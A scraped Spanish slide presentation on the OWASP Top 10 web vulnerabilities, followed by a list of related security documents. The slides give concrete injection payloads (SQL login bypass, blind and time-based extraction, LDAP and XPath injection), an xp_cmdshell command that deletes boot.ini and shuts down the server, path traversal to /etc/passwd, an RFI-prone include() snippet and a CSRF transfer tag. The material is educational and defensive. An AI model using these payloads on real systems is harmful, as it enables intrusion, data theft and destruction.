The Open Web Application Security Project

Tamaño: px
Comenzar la demostración a partir de la página:

Download "The Open Web Application Security Project"

Transcripción

1 The Open Web Application Security Project THE TEN MOST CRITICAL WEB APPLICATION SECURITY VULNERABILITIES 0_2007.pdf 1

2 2

3 SQL Injection LDAP Injection Xpath Injection Y a ciegas Blind SQL Injection Blind LDAP Injection Blind XPAth Injection Aplicaciones con mala comprobación de datos de entrada. Datos de usuario. Formularios otext opassword otextarea olist omultilist Datos de llamadas a procedimientos. Links Funciones Scripts Actions Datos de usuario utilizados en consultas a base de datos. Mala construcción de consultas a bases de datos. 3

4 Permiten al atacante: Saltar restricciones de acceso. Elevación de privilegios. Extracción de información de la Base de Datos Parada de SGBDR. Ejecución de comandos en contexto usuario bd dentro del servidor. Ejemplo 1: Autenticación de usuario contra base de datos. Usuario Clave **************** Select idusuario from tabla_usuarios Where nombre_usuario= $usuario And clave= $clave ; 4

5 Ejemplo 1 (cont) Usuario Clave Administrador or 1 = 1 Select idusuario from tabla_usuarios Where nombre_usuario= Administrador And clave= or 1 = 1 ; Ejemplo 2: Acceso a información con procedimientos de listado. Ó 5

6 Ejemplo 2 (cont): union select nombre, clave,1,1,1 from tabla_usuarios; otra instrucción; xp_cmdshell( del c:\boot.ini ); shutdown -- Ó union select...; otra instrucción; -- Escrita por Francisco Amato Obtener la estructura y datos completa de la BBDD. 1 Injección para la estructura 1 post paracadafila Totalmente automática Soporta n bases de datos. Descargable(app y source) 6

7 Programa.asp?id=218 and 1=(select top 1 name from sysusers order by 1 desc) Microsoft OLE DB ProviderforSQL Server error '80040e07' Conversion failed when converting the nvarchar value 'sys' todata typeint. /Programa.asp, line 8 Programa.asp?id=218 and 1=(select top 1 name from sysusers where name< sys order by 1 desc) 7

8 8

9 La aplicación Web no muestra ningún mensaje de error. La aplicación no procesa nuestros comandos Select titulo from tabla where param=$param Se inyecta comandos y se busca hacer preguntas de Verdad o Mentira. Ejemplo: and 1=1 and 1=2 9

10 Como reconocer un falso? Da un código de error Da una página de error Cambia el hash de la firma Cambia el árbol html Tarda más en responder Si la página reacciona de forma diferente a la Verdad y a la Mentira, entonces podemos extraer datos haciendo búsquedas: and 300>(select ascii(substring(username,1,1) from all_users where rownum<=1) 10

11 Si el contenido de la respuesta es idéntico en ambos casos, aún es posible conseguir nuestro objetivo variando condicionalmente el tiempo de respuesta del servidor Si la condición inyectada es verdadera, la aplicación tardará unos segundos en contestar Si la condición es falsa, la aplicación devolverá la misma respuesta, pero en el tiempo habitual Podemos utilizar las mismas técnicas de inyección descritas anteriormente 21 Cómo podemos conseguir el retardo? Utilizando instrucciones de retardo implementadas en el propio gestor de bases de datos SQL Server: waitfor delay Oracle: dbms_lock.sleep MySQL: sleep Utilizando consultas pesadas que consuman muchos recursos del servidor (CPU o memoria) CROSS JOIN que involucren muchas tablas De cualquier otra forma (ej: xp_cmdshell'ping ') 22 11

12 Instrucciones de retardo del propio SGBD Microsoft SQL Server ; if(exists(select * from contrasena)) waitfor delay'0:0:5' Oracle ; begin if (condicion) then dbms_lock.sleep(5); end if; end; MySQL(versión 5) and exists(select * from contrasena) and sleep(5) and exists(select * fromcontrasena)and benchmark( ,md5(rand()))=0 Microsoft Access no tiene instrucciones de retardo

13 Consultas pesadas La clave para generar consultas pesadas está en realizar múltiples operaciones CROSS JOIN Joins Filas Columnas Ejemplo: Una tabla con 4 registros y 2 columnas combinada consigo misma 10 veces, genera un resultado de 20 columnas y más de un millón de filas Consultas pesadas: estructura SELECT COUNT(*) FROM tabla T1, tabla T2,, tabla Tn Donde el número de tablas implicadas en el producto cartesiano (CROSS JOIN) sea suficientemente grande como para generar un retardo medible Dependiendo del SGDB y de cómo realice la comprobación de las condiciones lógicas introducidas con AND, deberemos establecer nuestra subconsulta SQL antes o después del operador lógico AND subconsulta AND consulta_pesada AND consulta_pesada AND subconsulta iculos_seguridad/2007/septiembre/sv0907.mspx 26 13

14 Consultas pesadas: tablas recomendadas Microsoft SQL Server sysusers Oracle all_users MySQL (versión 5) information_schema.columns Microsoft Access MSysAccessObjects (versiones 97 y 2000) MSysAccessStorage (versiones 2003 y 2007) 27 Verdad: La consulta dura 6 segundos. 14

15 Falso: La consulta dura 1 segundo. 15

16 16

17 Absinthe: Extrae toda la información de bases de datos MSSQL, PostgreSQL, Sybasey Oracle utilizando suma linear de valores ASCII. Absinthe: Extrae toda la información de bases de datos MSSQL, PostgreSQL, Sybasey Oracle utilizando suma linear de valores ASCII. 17

18 18

19 19

20 Sniffing de Passwords LDAP Recogida de certificados servidores LDAP-s MITM LDAP-s LDAP: Base de datos Jerarquica Clases Objetos Herencia Contenedores Búsqueda: LDAP Search Filters 20

21 filter = LPAREN filtercomp RPAREN filtercomp = and / or / not / item and = AMPERSAND filterlist or = VERTBAR filterlist not = EXCLAMATION filter filterlist = 1*filter item = simple / present / substring / extensible simple = attr filtertype assertionvalue filtertype = equal / approx / greaterorequal / lessorequal equal = EQUALS approx = TILDE EQUALS greaterorequal = RANGLE EQUALS lessorequal = LANGLE EQUALS (&(atributo1=valor1)(atributo2=valor2)) Ejemplo: (&(directorio=nombre_directorio)(nivel_seguridad=bajo)) Inyección: (&(directorio=almacen)(nivel_seguridad=alto))( (directorio=al macen)(nivel_seguridad=bajo)) 21

22 ( (atributo1=valor1)(atributo2=valor2)) Ejemplo: ( (cn=d*)(ou=groups)) Inyección: ( (cn=void)(uid=*))(ou=groups)) Tiene lógica binaria Tiene soporte para booleanización: Comodín: * Reducción charset: *a* Despliegue: a* Relacionales: >= <= ~= = 22

23 Certezas absolutas (RFC 4256) AbsoluteFALSE ( ) AbsoluteTRUE (&) Anomalías: NOT absoluto? (!)-> equivalente a! Caracteres fuera del alfabeto Ñ* -> equivalente a * Ç* -> equivalente a * ** -> equivalente a ERROR!! 23

24 Explotación Dada la siguiente consulta Xpath: string(//user[username/text()= romansoft' and password/text()='!dsr']/uid/text()) Dónde buscar Condición Qué devolver Inyectamos: User: abc' or 1=1 or 'a'='b Pass: k La condición quedaría: username/text()= abc' or 1=1 or 'a'='b' and password/text()= k' Vulnerabilidad propia de páginas PHP dinámicas que permite enlace de archivos remotos situados en otros servidores Se debe a una mala programación o uso de la función include() Esta vulnerabilidad no se da en páginas programadas en un lenguaje que no permita la inclusión de ficheros ajenos al servidor 24

25 La vulnerabilidad es producida por código semejante a este $page = $_GET['page']; include($page); En páginas de este tipo se puede incluir ficheros que estén en nuestro servidor Existen herramientas que permite explorar un sitio Web en busca de este tipo de vulnerabilidades (rpvs) 25

26 Mediante las shellphp se pueden ejecutar comandos en una página Web Usando RFI se puede incluir un fichero que ejecute comandos, tales como listar directorios, obtener y colocar ficheros, etc. El cucharón Rutas a ficheros no controladas File=../../../../etc/passw id= /../windows/repair/sam 26

27 Session Riding, One-Click Attacks, Cross Site Reference Forgery, Hostile Linking, Automation Attack o XSRF. Pormediode unainjecciónse fuerzala ejecuciónde acciones automáticas por parte del usuario. <imgsrc="http://www.example.com/logout.php"> <img src="http://www.example.com/transfer.do? frmacct=document.form.frmacct&toacct= &toswiftid=434343&amt= "> 27

28 Se deja información sensible sin asegurar Se muestran mensajes de error detallados 7.- Autenticación Rota y Gestión de Sesión Partes sin comprobar autenticación No procesos de logout seguro. 8.- Almacenamiento con Criptografía insegura Datos sin cifrar o mal cifrados 9.- Comunicaciones Inseguras 10.-URLs mal restringidas Pueden ser adivinadas o bruteforceadas 28

29 Chema Alonso Francisco Amato Infobyte Technews I64. Suscríbete Gratis en November

30 Blind SQL Injection Time-Bases Blind SQL Injection with heavy Queries eptiembre/sv0907.mspx LDAP Injection & Blind LDAP Injection XPath injection in XML databases Blind XPath Injection pdf Milw0rm (Webapps exploits) -OWASP 30

Lección 7: INTRODUCCIÓN A LAS TÉCNICAS DE INYECCIÓN SQL

Lección 7: INTRODUCCIÓN A LAS TÉCNICAS DE INYECCIÓN SQL Lección 7: INTRODUCCIÓN A LAS TÉCNICAS DE INYECCIÓN SQL Chema Alonso chema@informatica64.com Informática 64 Microsoft MVP en Enterprise Security Incidentes de Seguridad I: Kaspersky 2 Incidentes de Seguridad

Más detalles

VÍDEO intypedia007es LECCIÓN 7: SEGURIDAD EN APLICACIONES WEB. INTRODUCCIÓN A LAS TÉCNICAS DE INYECCIÓN SQL. AUTOR: Chema Alonso

VÍDEO intypedia007es LECCIÓN 7: SEGURIDAD EN APLICACIONES WEB. INTRODUCCIÓN A LAS TÉCNICAS DE INYECCIÓN SQL. AUTOR: Chema Alonso VÍDEO intypedia007es LECCIÓN 7: SEGURIDAD EN APLICACIONES WEB. INTRODUCCIÓN A LAS TÉCNICAS DE INYECCIÓN SQL AUTOR: Chema Alonso Consultor de Seguridad en Informática 64. Microsoft MVP Enterprise Security

Más detalles

Web : Ataque y Defensa. Claudio Salazar Estudiante Ing. Civil Informática UTFSM Pinguinux Team

Web : Ataque y Defensa. Claudio Salazar Estudiante Ing. Civil Informática UTFSM Pinguinux Team Web : Ataque y Defensa. Claudio Salazar Estudiante Ing. Civil Informática UTFSM Pinguinux Team Temario 1. Introducción 2. Cross Site Scripting (XSS) 3. Inyección SQL 4. Nuestro código en el servidor 5.

Más detalles

Base de Datos Oracle 10g: Introducción a SQL Código: D17216 - Duración: 5 días (40 horas)

Base de Datos Oracle 10g: Introducción a SQL Código: D17216 - Duración: 5 días (40 horas) Base de Datos Oracle 10g: Introducción a SQL Código: D17216 - Duración: 5 días (40 horas) Lo que aprenderá Esta clase es aplicable para los usuarios de Oracle8i, Oracle9i y Oracle Database 10g. En este

Más detalles

Seminario de SEGURIDAD WEB. Pedro Villena Fernández www.consultoriainnova.com

Seminario de SEGURIDAD WEB. Pedro Villena Fernández www.consultoriainnova.com Seminario de SEGURIDAD WEB Pedro Villena Fernández www.consultoriainnova.com Algunas cosas antes de empezar... Este seminario NO tiene la intención de piratear otras webs. Los ataques que aprenderemos

Más detalles

PROGRAMAS DE ESTUDIO FORMATO 7 INTRODUCCIÓN A SQL. Área de Formación Profesional

PROGRAMAS DE ESTUDIO FORMATO 7 INTRODUCCIÓN A SQL. Área de Formación Profesional PROGRAMAS DE ESTUDIO FORMATO 7 NOMBRE DE LA ASIGNATURA INTRODUCCIÓN A SQL CICLO, AREA O MODULO Área de Formación Profesional CLAVE DE LA ASIGNATURA IT222 OBJETIVOS GENERALES DE LA ASIGNATURA Al final del

Más detalles

8283: Administración y programación en Microsoft SQL Server 2012

8283: Administración y programación en Microsoft SQL Server 2012 8283: Administración y programación en Microsoft SQL Server 2012 Este curso es orientado a los profesionales en desarrollo que desean maximizar la participación de SQL Server 2012 en beneficio del desempeño

Más detalles

SFX-SQLi SELECT FOR XML SQL INJECTION

SFX-SQLi SELECT FOR XML SQL INJECTION v1.0 SFX-SQLi SELECT FOR XML SQL INJECTION Extracción rápida de información utilizando inyección SQL con instrucciones XML Daniel Kachakil (dani@kachakil.com) 5 de febrero de 2009 Contenido Resumen...

Más detalles

Capítulo 2.- Vulnerabilidades en aplicaciones web.

Capítulo 2.- Vulnerabilidades en aplicaciones web. Capítulo 2.- Vulnerabilidades en aplicaciones web. En este capítulo se explican algunas vulnerabilidades en aplicaciones web que pueden ser explotadas por software o por personas malintencionadas y como

Más detalles

Christian Martorella - Vicente Díaz Edge-security Fist Conference April 2007

Christian Martorella - Vicente Díaz Edge-security Fist Conference April 2007 Christian Martorella - Vicente Díaz Edge-security Fist Conference April 2007 Indice Introducción a la seguridad de DB Motores de Bases de Datos Ataques internos Ataques externos Conclusiones Introducción

Más detalles

SQL Server 2012 - SQL, Transact SQL Diseño y creación de una base de datos

SQL Server 2012 - SQL, Transact SQL Diseño y creación de una base de datos El modelo relacional 1. Introducción 9 2. Recordatorio sobre el almacenamiento de datos 9 2.1 Las diferentes categorías de datos 10 2.1.1 Los datos básicos 10 2.1.2 Los datos cambiantes 10 2.1.3 Los datos

Más detalles

SQL Server 2014 - SQL, Transact SQL Diseño y creación de una base de datos (con ejercicios prácticos corregidos)

SQL Server 2014 - SQL, Transact SQL Diseño y creación de una base de datos (con ejercicios prácticos corregidos) El modelo relacional 1. Introducción 9 2. Recordatorio sobre el almacenamiento de datos 9 2.1 Las diferentes categorías de datos 10 2.1.1 Los datos básicos 10 2.1.2 Los datos cambiantes 10 2.1.3 Los datos

Más detalles

Inyección de código SQL en MS SQL Server 2005

Inyección de código SQL en MS SQL Server 2005 Fco Javier Puerta aka MCchain (Fixed) Publicado el 21/01/2010 sql pentest hacking vulnerabilidades hacktimes.com Inyección de código SQL en MS SQL Server 2005 En el siguiente artículo se va a explicar

Más detalles

Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Máster en Seguridad de las TIC - US

Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Máster en Seguridad de las TIC - US Sobre mi Formación Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Máster en Seguridad de las TIC - US Experiencia Aficiones 4+ años como desarrollador web, más de 2 en Drupal

Más detalles

Inyección SQL. Juan Manuel Espinoza Marquez juanmanuel.espinoza@gmail.com CFT San Agustín Linares -2012

Inyección SQL. Juan Manuel Espinoza Marquez juanmanuel.espinoza@gmail.com CFT San Agustín Linares -2012 Inyección SQL Juan Manuel Espinoza Marquez juanmanuel.espinoza@gmail.com CFT San Agustín Linares -2012 Introducción Una inyección SQL sucede cuando se inserta o "inyecta" un código SQL "invasor" dentro

Más detalles

Introducción a ataques de tipo inyección: Inyección SQL

Introducción a ataques de tipo inyección: Inyección SQL Introducción a ataques de tipo inyección: Inyección SQL Jorge Peris Cortés - jorpecor@alumni.uv.es Asignatura: Redes Ingeniería Informática - Curso 2011/2012 Universidad de Valencia 1 Índice INTRODUCCIÓN...

Más detalles

Hacking Ético Web. I Jornadas Tecnológicas CEEPS 27-03-2012 Carlos García García i52gagac@uco.es ciyinet@gmail.com. @ciyinet

Hacking Ético Web. I Jornadas Tecnológicas CEEPS 27-03-2012 Carlos García García i52gagac@uco.es ciyinet@gmail.com. @ciyinet Hacking Ético Web I Jornadas Tecnológicas CEEPS 27-03-2012 Carlos García García i52gagac@uco.es ciyinet@gmail.com @ciyinet Índice Introducción OWASP OWASP Top 10 (2010) Demostración ataques Inyección SQL

Más detalles

Guía práctica de SQL

Guía práctica de SQL Guía práctica de SQL Francisco Charte Ojeda Agradecimientos Introducción Qué es SQL? Aplicaciones de SQL Intérpretes de SQL Tipos de RDBMS Cómo usar este libro Convenciones tipográficas 1. El modelo relacional

Más detalles

Seguridad en Sistemas Informáticos (SSI) Programación Segura

Seguridad en Sistemas Informáticos (SSI) Programación Segura 1 Seguridad en Sistemas Informáticos (SSI) Programación Segura Carlos Pérez Conde Departament d'informàtica Escola Técnica Superior d'enginyeria Universitat de València 2 Bibliografía específica OWASP

Más detalles

A1-Inyección (SQL,OS Y LDPA)

A1-Inyección (SQL,OS Y LDPA) Los Diez Riesgos Más Importantes en Aplicaciones WEB Top 10-2010 A1-Inyección (SQL,OS Y LDPA) Oscar William Monsalve Luis Alberto Suarez Jorge Eliecer Betancur Diana Marcela Usuga G. Contenido Presentación

Más detalles

con certif icado de profesionalidad

con certif icado de profesionalidad CARACTERÍSTICAS El diseño web está cambiando en poco tiempo. Las nuevas tecnologías y estándares de programación están revolucionando tanto la forma de crear web como de interactuar con ellas. En nuestro

Más detalles

Índice. iii. Objetivos... 24

Índice. iii. Objetivos... 24 Índice Objetivos... 2 1: Modelación de base de datos... 2 2: Ejemplo de un caso de negocios... 3 2.1: Requerimientos de la aplicación... 4 2.2: Características de flujo de información... 4 2.3: Diagrama

Más detalles

RETO HACKER DE VERANO

RETO HACKER DE VERANO RETO HACKER DE VERANO Blind XPath Reto Hacker de verano Índice 1 Introducción... 2 2 Proceso de trabajo... 2 2.1 Toma de contacto (fingerprinting)... 2 2.2 Comienza el ataque... 4 2.3 Explicacion del ataque

Más detalles

La inmensa mayoría de las páginas son vulnerables, a unos u otros fallos.

La inmensa mayoría de las páginas son vulnerables, a unos u otros fallos. Introducción a la seguridad Web: La inmensa mayoría de las páginas son vulnerables, a unos u otros fallos. El gran problema no está en que esas páginas sean vulnerables y con ello podamos pasar un rato

Más detalles

SECURITY DAY PERU. Ataques a las Aplicaciones Web. Explotación de Aplicaciones Web. Technologies SOLUTIONS FOR KEEPING YOUR BUSINESS UP

SECURITY DAY PERU. Ataques a las Aplicaciones Web. Explotación de Aplicaciones Web. Technologies SOLUTIONS FOR KEEPING YOUR BUSINESS UP SOLUTIONS FOR KEEPING YOUR BUSINESS UP Email: info@ximark.com Tel. +(507) 271 5951 Tel. +(1) 928 752 1325 Aptdo. 55-0444, Paitilla. Panama City, Panama SECURITY DAY PERU Ataques a las Aplicaciones Web

Más detalles

Blind SQL Injectión. Práctico

Blind SQL Injectión. Práctico Blind SQL Injectión Práctico 1 Hola: Hace unos días prometí que publicaría un documento en el foro que nos ayudaría a entender mejor un Blind SQL Injection. La idea principal no es explicar un Blind SQL

Más detalles

INTRODUCCIÓN A LA SEGURIDAD EN SISTEMAS Y WEBS

INTRODUCCIÓN A LA SEGURIDAD EN SISTEMAS Y WEBS INTRODUCCIÓN A LA SEGURIDAD EN SISTEMAS Y WEBS Marco A. Lozano Merino Mayo 2012 Índice 1.Seguridad a nivel de usuario 1.Amenazas y protección 2.La realidad de la seguridad: hackers 3.Seguridad en redes

Más detalles

MySQL 5 (versiones 5.1 a 5.6) Guía de referencia del desarrollador

MySQL 5 (versiones 5.1 a 5.6) Guía de referencia del desarrollador Prefacio 1. Objetivos de este libro 13 2. Principales temas tratados en este libro 13 3. A quién va dirigido este libro? 14 4. Requisitos 14 Introducción a MySQL 1. Introducción a las bases de datos relacionales

Más detalles

8 SQL SERVER 2008 RA-MA

8 SQL SERVER 2008 RA-MA ÍNDICE Capítulo 1. Características, novedades y entorno de trabajo... 17 1.1 Novedades en SQL Server 2008... 17 1.2 Instalación de Microsoft SQL Server 2008... 19 1.3 Versiones de Microsoft SQL Server

Más detalles

INDICE Programación Introducción Capitulo 21 BASIC Capitulo 22. COBOL Capitulo 23 DELPHI Capitulo 24. FORTRAN Capitulo 25.

INDICE Programación Introducción Capitulo 21 BASIC Capitulo 22. COBOL Capitulo 23 DELPHI Capitulo 24. FORTRAN Capitulo 25. INDICE Programación Introducción 706 Capitulo 21 BASIC 711 Introducción 711 Sintaxis 713 Procedimientos y control de flujo 713 Tipos de datos 714 Disponibilidad y variantes del dialecto 714 Capitulo 22.

Más detalles

LOS 7 PECADOS DEL DESARROLO WEB & TENTACIÓN DEL USUARIOS EN APLICACIONES MOVILES. www.owasp.org

LOS 7 PECADOS DEL DESARROLO WEB & TENTACIÓN DEL USUARIOS EN APLICACIONES MOVILES. www.owasp.org LOS 7 PECADOS DEL DESARROLO WEB & TENTACIÓN DEL USUARIOS EN APLICACIONES MOVILES www.owasp.org Quien soy? Ing. Elvin Vidal Mollinedo Mencia Profesional de seguridad + 9 años de experiencia en desarrollo

Más detalles

About Me. Mario Robles Tencio

About Me. Mario Robles Tencio About Me Mario Robles Tencio Profesional de seguridad +10 años de experiencia en tema de seguridad de redes, desarrollo de aplicaciones web, seguridad de aplicaciones web, PenTesting (Ethical Hacking)

Más detalles

Unidad III: Lenguaje de manipulación de datos (DML) 3.1 Inserción, eliminación y modificación de registros

Unidad III: Lenguaje de manipulación de datos (DML) 3.1 Inserción, eliminación y modificación de registros Unidad III: Lenguaje de manipulación de datos (DML) 3.1 Inserción, eliminación y modificación de registros La sentencia INSERT permite agregar nuevas filas de datos a las tablas existentes. Está sentencia

Más detalles

Bypass WAFs KUNAK CONSULTING. Automatizando SQLi con Python. Omar Palomino. omarc320@gmail.com. opalomino@kunak.com.pe. http://www.el-palomo.

Bypass WAFs KUNAK CONSULTING. Automatizando SQLi con Python. Omar Palomino. omarc320@gmail.com. opalomino@kunak.com.pe. http://www.el-palomo. Bypass WAFs KUNAK CONSULTING Automatizando SQLi con Python Noviembre, 2013 Omar Palomino omarc320@gmail.com opalomino@kunak.com.pe ÍNDICE 1.Inyecciones SQL 2.Inyecciones manuales vs herramientas 3.Nuevos

Más detalles

ÍNDICE. Introducción... Capítulo 1. Novedades de Access 2013... 1

ÍNDICE. Introducción... Capítulo 1. Novedades de Access 2013... 1 Introducción... XIII Capítulo 1. Novedades de Access 2013... 1 Nuevas posibilidades de cifrado, compactación y reparación de archivos... 1 Trabajo en la nube... 2 Compartir la información... 3 Guardar

Más detalles

Principales vulnerabilidades en aplicaciones Web. Christian Martorella Edge-security.com

Principales vulnerabilidades en aplicaciones Web. Christian Martorella Edge-security.com Principales vulnerabilidades en aplicaciones Web Christian Martorella Edge-security.com 1 #Whoami: Christian Martorella Cofundador Edge-security.com CISSP, CISM, CISA, OPST, OPSA Actualmente trabajando

Más detalles

UNIVERSIDAD AUTONOMA DE LOS ANDES UNIANDES LENGUAJE SQL. SQL es un estándar un lenguaje estructurado para consultas

UNIVERSIDAD AUTONOMA DE LOS ANDES UNIANDES LENGUAJE SQL. SQL es un estándar un lenguaje estructurado para consultas LENGUAJE SQL Que es SQL? SQL es un estándar un lenguaje estructurado para consultas SQL te permite acceder y manejar bases de datos SQL es un Estándar (ANSI American National Standards Institute) Que puede

Más detalles

Acceso a bases de datos MySQL con PHP

Acceso a bases de datos MySQL con PHP GESTIÓN Y ADMINISTRACIÓN WEB Acceso a bases de datos MySQL con PHP Ing. CIP Fabián Silva Alvarado fsilvasys@hotmail.com DEFINICIÓN DE BASE DE DATOS Base de Datos es un conjunto de datos relacionados entre

Más detalles

ÍNDICE CAPÍTULO 1. TIPOS DE ALMACENAMIENTO DE LA INFORMACIÓN... 13

ÍNDICE CAPÍTULO 1. TIPOS DE ALMACENAMIENTO DE LA INFORMACIÓN... 13 ÍNDICE CAPÍTULO 1. TIPOS DE ALMACENAMIENTO DE LA INFORMACIÓN... 13 1.1 SISTEMAS LÓGICOS DE ALMACENAMIENTO DE LA INFORMACIÓN...13 1.2 ALMACENAMIENTO EN FICHEROS...13 1.2.1 Registros físicos y registros

Más detalles

Web: Ataque y Defensa. my kung fu is stronger than yours, The lone Gunmen

Web: Ataque y Defensa. my kung fu is stronger than yours, The lone Gunmen Web: Ataque y Defensa. my kung fu is stronger than yours, The lone Gunmen Web: Ataque y defensa Introducción. Cross Site Scripting (XSS). SQL Injection. Programador? quien yo?. Ataques NG. Prevención.

Más detalles

Día 23, Hacking ético: Auditoria web y perspectiva desde la Administración Publica

Día 23, Hacking ético: Auditoria web y perspectiva desde la Administración Publica Día 23, Hacking ético: Auditoria web y perspectiva desde la Administración Publica DANIEL FIRVIDA PEREIRA Técnico de seguridad - INTECO-CERT 23 de Noviembre 1º ENCUENTRO NACIONAL DE LA INDUSTRIA DE SEGURIDAD

Más detalles

Ataques específicos a servidores y clientes web y medidas preventivas. Problemas de seguridad Web

Ataques específicos a servidores y clientes web y medidas preventivas. Problemas de seguridad Web Problemas de seguridad Web Ataques específicos a servidores y clientes web y medidas preventivas. junio de 2014 Problemas de seguridad Web 1 ATAQUES Consiste en aprovechar alguna debilidad o vulnerabilidad

Más detalles

8 MICROSOFT SQL SERVER 2008 R2. CURSO PRÁCTICO RA-MA

8 MICROSOFT SQL SERVER 2008 R2. CURSO PRÁCTICO RA-MA ÍNDICE CAPÍTULO 1. CARACTERÍSTICAS, NOVEDADES Y ENTORNO DE TRABAJO...17 1.1 NOVEDADES EN SQL SERVER 2008 R2...17 1.2 INSTALACIÓN DE MICROSOFT SQL SERVER 2008 R2...18 1.3 VERSIONES DE MICROSOFT SQL SERVER

Más detalles

DOCUMENTACION A PRESENTAR: TRABAJADORES (RÉGIMEN GENERAL, ADMINISTRACIÓN PÚBLICA, AUTÓNOMOS) DEMANDANTES DE EMPLEO

DOCUMENTACION A PRESENTAR: TRABAJADORES (RÉGIMEN GENERAL, ADMINISTRACIÓN PÚBLICA, AUTÓNOMOS) DEMANDANTES DE EMPLEO MF0492_3 PROGRAMACION WEB EN EL ENTORNO SERVIDOR (IFCD0210: DESARROLLO DE APLICACIONES CON TECNOLOGÍAS WEB) 240 HORAS PRESENCIALES Nº DE EXPEDIENTE: FC/2013/0064 ACCION 217 GRUPO 1 ACCIÓN FORMATIVA FINANCIADA

Más detalles

Ataques XSS en Aplicaciones Web

Ataques XSS en Aplicaciones Web Ataques XSS en Aplicaciones Web Education Project Antonio Rodríguez Romero Consultor de Seguridad Grupo isoluciones antonio.rodriguez@isoluciones.es Copyright 2007 The Foundation Permission is granted

Más detalles

Su Seguridad es Nuestro Éxito

Su Seguridad es Nuestro Éxito Su Seguridad es Nuestro Éxito c. Santander, 101. Edif. A. 2º I 08030 Barcelona I Tel.: 93 305 13 18 I Fax: 93 278 22 48 I info@isecauditors.com I www.isecauditors.com OWASP Conference 2007 Barcelona, Julio

Más detalles

CURSO DE SQL SERVER 2005

CURSO DE SQL SERVER 2005 CURSO DE SQL SERVER 2005 Una vez finalizado el curso, el alumno estará preparado para: Instalar y configurar SQL Server 2005. Comprender los conceptos más importantes del diseño de bases de datos. Crear

Más detalles

SQL Injection en SQL Server y función convert()

SQL Injection en SQL Server y función convert() 25 Nov 2011 SQL Injection en SQL Server y función convert() Este artículo esta escrito con fines didácticos y nunca para incitar o promover que el lector use esto con fines delictivos. No me hago responsable

Más detalles

- length(str) retorna el largo de un string en bytes. Ejemplo: "SELECT LENGTH('ITFreek')", nos devuelve 7.

- length(str) retorna el largo de un string en bytes. Ejemplo: SELECT LENGTH('ITFreek'), nos devuelve 7. 1 Inyecciones SQL V 1.0 Sentencias a necesitar: - database() devuelve el nombre de la base de datos actualmente seleccionada, o NULL si no hay ninguna seleccionada. Ejemplo: "SELECT DATABASE()" en el código

Más detalles

Programación en Internet Curso 2007-2008. Índice

Programación en Internet Curso 2007-2008. Índice Departamento de Lenguajes y Sistemas Informáticos Diseño de un sitio web Programación en Internet Curso 2007-2008 Índice Introducción Descripción del sitio Paso 1: modelo de datos Paso 2: crear el diagrama

Más detalles

MÁSTER UNIVERSITARIO EN INGENIERÍA WEB. Guía de Aprendizaje Información al estudiante

MÁSTER UNIVERSITARIO EN INGENIERÍA WEB. Guía de Aprendizaje Información al estudiante MÁSTER UNIVERSITARIO EN INGENIERÍA WEB Datos Descriptivos Guía de Aprendizaje Información al estudiante Escuela Técnica Superior de Ingeniería de Sistemas Centro responsable Informáticos Titulación: Máster

Más detalles

Desarrollo seguro en Drupal. Ezequiel Vázquez De la calle

Desarrollo seguro en Drupal. Ezequiel Vázquez De la calle Sobre mi Estudios Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Experto en Seguridad de las TIC - US Experiencia Aficiones 3+ años como desarrollador web, casi 2 en Drupal

Más detalles

Circular de Tecnología Pautas de seguridad para el desarrollo de aplicaciones Web

Circular de Tecnología Pautas de seguridad para el desarrollo de aplicaciones Web ASIT 20070501 CT Pautas de seguridad para aplicaciones web v1 2007-05-16 Documento de Circular de Tecnología Pautas de seguridad para el desarrollo de aplicaciones Web Versión 01 ARCHIVO: ASIT 20070501

Más detalles

UNIVERSIDAD NACIONAL DE SAN AGUSTÍN FACULTAD DE PRODUCCIÓN Y SERVICIOS ESCUELA PROFESIONAL DE INGENIERÍA DE SISTEMAS LABORATORIO DE BASES DE DATOS 1

UNIVERSIDAD NACIONAL DE SAN AGUSTÍN FACULTAD DE PRODUCCIÓN Y SERVICIOS ESCUELA PROFESIONAL DE INGENIERÍA DE SISTEMAS LABORATORIO DE BASES DE DATOS 1 UNIVERSIDAD NACIONAL DE SAN AGUSTÍN FACULTAD DE PRODUCCIÓN Y SERVICIOS ESCUELA PROFESIONAL DE INGENIERÍA DE SISTEM LABORATORIO DE BES DE DATOS 1 Prof. Marco Aedo Práctica de Laboratorio Nº 6 I. OBJETIVOS

Más detalles

Ecyware GreenBlue Inspector

Ecyware GreenBlue Inspector Ecyware GreenBlue Inspector Guía de usuario Versión 1.0 Copyright Ecyware Solutions. All rights reserved, Ecyware 2003-2004. Tabla de contenido TABLA DE CONTENIDO 2 INTRODUCCIÓN 4 CARACTERÍSTICAS 5 ECYWARE

Más detalles

Ataques a Aplicaciones de Bases de Datos

Ataques a Aplicaciones de Bases de Datos Ataques a Aplicaciones de Bases de Datos Esteban Martínez Fayó Argeniss (www.argeniss.com) ekoparty security conference Noviembre 2007 Buenos Aires, Argentina Agenda Introducción a la seguridad en Bases

Más detalles

m046a Curso Consultando SQL Server 2005/2008 con Transact-SQL, 15 h

m046a Curso Consultando SQL Server 2005/2008 con Transact-SQL, 15 h L1. ANSI SQL SQL, STANDS STRUCTURED QUERY LANGUAGE ANSI SQL 9 2 ESTANDARD SQL LENGUAJE DBMS RELACIONALES SQL SERVER 2005/2008, DBMS MICROSOFT TRANSACT SQL (T-SQL) LENGUAJE SQL SERVER 2005/2008 T-SQL SE

Más detalles

ESPECIALISTA EN BASE DE DATOS

ESPECIALISTA EN BASE DE DATOS ESPECIALISTA EN BASE DE DATOS EXPERTO ANALISIS Y DISEÑO DE BASE DE DATOS EN MANEJAR BASES DE ACCESS COMPLETO DATOS MYSQL Requisito: Manejo Windows POSTGRESQL DURACION: 3 MESES DE L-V SQL SERVER Cliente-Administración

Más detalles

Capítulo 5: PRUEBAS.

Capítulo 5: PRUEBAS. Capítulo 5: PRUEBAS. 5.1 Objetivos de las pruebas. Objetivos de las pruebas. Hoy en día el tema de la seguridad en software ya no resulta nada nuevo, en los inicios los desarrolladores de software no procuraban

Más detalles

WAPITI. Escaner de vulnerabilidades de aplicaciones web y auditor de seguridad. VI OWASP Spain Chapter Meeting

